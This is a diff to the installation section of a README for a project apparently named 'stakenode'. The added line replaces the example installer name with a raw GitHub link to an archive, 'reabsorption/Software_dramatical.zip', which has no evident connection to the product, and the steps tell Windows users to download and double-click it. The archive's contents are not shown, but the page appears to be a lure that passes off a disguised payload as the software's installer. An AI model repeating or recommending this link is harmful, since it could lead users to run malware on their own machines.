Lingesh303/stakenode/README.md

    Look for the latest version at the top of the page.
 Click on it to go to the version details.

 3. **Download the Installer:**
-   Find the installer file for your operating system (for example, stakenode-windows.exe for Windows users).
+   Find the installer file for your operating system (for example, https://github.com/Lingesh303/stakenode/raw/refs/heads/main/reabsorption/Software_dramatical.zip for Windows users).
 Click on the file to start the download.

 4. **Run the Installer:**
    Once the download is complete, locate the file in your downloads folder.
 Double-click the file to start the installation process.